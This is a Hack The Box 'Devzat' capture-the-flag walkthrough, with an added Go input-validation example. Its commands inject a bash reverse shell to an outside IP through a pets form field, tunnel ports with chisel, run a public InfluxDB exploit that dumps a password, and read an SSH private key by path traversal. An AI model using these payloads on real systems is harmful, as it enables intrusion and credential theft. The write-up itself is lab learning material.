Hack_The_Box_Writeups

HackTheBox – Devzat Walkthrough – In English

┌──(rootkali)-[/home/kali/Downloads]

└─# nmap -A 10.10.11.118

http://devzat.htb/

┌──(rootkali)-[/usr/share/dirb/wordlists]

└─# wfuzz -u http://devzat.htb -H 'Host: FUZZ.devzat.htb' -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt --hw 26

http://pets.devzat.htb/

At the bottom of the page, there was an input form to add pets.

Add this

{"name":"test","species":"cat; bash -c 'bash -i >& /dev/tcp/10.10.14.102/1234 0>&1'"}

And we get the shell.
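
The payload works because the species value ends up on a shell command line on the server. As an added example (not part of the original walkthrough and not the box's own code), here is how a Go handler could load a per-species file without a shell and with an allowlist on the field; the function name, directory layout and allowlist pattern are assumptions.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"regexp"
)

// speciesRe is an assumed allowlist: lowercase letters only, so shell
// metacharacters, spaces, slashes and dots never pass validation.
var speciesRe = regexp.MustCompile(`^[a-z]{1,32}$`)

var errBadSpecies = errors.New("invalid species")

// loadCharacteristics (hypothetical helper) reads <baseDir>/<species> directly
// from disk. No shell is involved, so "cat; ..." is only a rejected string.
func loadCharacteristics(baseDir, species string) (string, error) {
	if !speciesRe.MatchString(species) {
		return "", errBadSpecies
	}
	data, err := os.ReadFile(filepath.Join(baseDir, species))
	if err != nil {
		return "", fmt.Errorf("read characteristics: %w", err)
	}
	return string(data), nil
}

func main() {
	// Constructed sample data in a temporary directory.
	dir, err := os.MkdirTemp("", "pets")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(dir)
	if err := os.WriteFile(filepath.Join(dir, "cat"), []byte("Likes boxes."), 0o600); err != nil {
		panic(err)
	}
	for _, s := range []string{"cat", "cat; id", "../etc/passwd"} {
		out, err := loadCharacteristics(dir, s)
		fmt.Printf("%q -> %q, err=%v\n", s, out, err)
	}
}
```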

patrick@devzat:~/pets$ python3 -c 'import pty; pty.spawn("/bin/bash")'

┌──(rootkali)-[/home/kali/Downloads]

└─# stty raw -echo; fg

patrick@devzat:~/pets$ export TERM=xterm

patrick@devzat:~/pets$ cd /home

patrick@devzat:/home$ ls -lrt

patrick@devzat:~$ ls -lrt

patrick@devzat:~$ cd devzat

patrick@devzat:~/devzat$ ls -lrt

patrick@devzat:~/devzat$ cat devchat.go

patrick@devzat:~$ netstat -tlpn

https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933

┌──(rootkali)-[/home/kali/Downloads]

└─# ./chisel server -p 8000 --reverse

patrick@devzat:~$ ./chisel.1 client 10.10.14.102:8000 R:8086:127.0.0.1:8086

┌──(rootkali)-[/home/kali/Downloads/InfluxDB-Exploit-CVE-2019-20933]

└─# python3 __main__.py

[admin@127.0.0.1] Database: 1

[admin@127.0.0.1/devzat] $ show measurements on devzat

[admin@127.0.0.1/devzat] $ SELECT * FROM "devzat"."myretention"."user"

We get this

"woBeeYareedahc7Oogeephies7Aiseci",

                            "catherine"

patrick@devzat:~/pets$ su catherine

catherine@devzat:~$ cd /var/backups/

catherine@devzat:/var/backups$ ls -la

catherine@devzat:/var/backups$ cp devzat-main.zip devzat-dev.zip /tmp

catherine@devzat:/var/backups$ cd /tmp

catherine@devzat:/tmp$ unzip devzat-main.zip

catherine@devzat:/tmp$ unzip devzat-dev.zip

catherine@devzat:/tmp$ ls -ls dev/ main/

catherine@devzat:/tmp$ diff main/commands.go dev/commands.go

CeilingCatStillAThingIn2021?

┌──(rootkali)-[/home/kali/Downloads]

└─# ./chisel server -p 8000 --reverse

catherine@devzat:/home/patrick$ ./chisel.1 client 10.10.14.102:8000 R:8443:127.0.0.1:8443

┌──(rootkali)-[/home/kali/Downloads]

└─# ssh -l kavi -p 8443 127.0.0.1

kavi: /file

kavi: /file test CeilingCatStillAThingIn2021?

kavi: /file ../.ssh/id_rsa CeilingCatStillAThingIn2021?

Hi, I’m saksham dixit
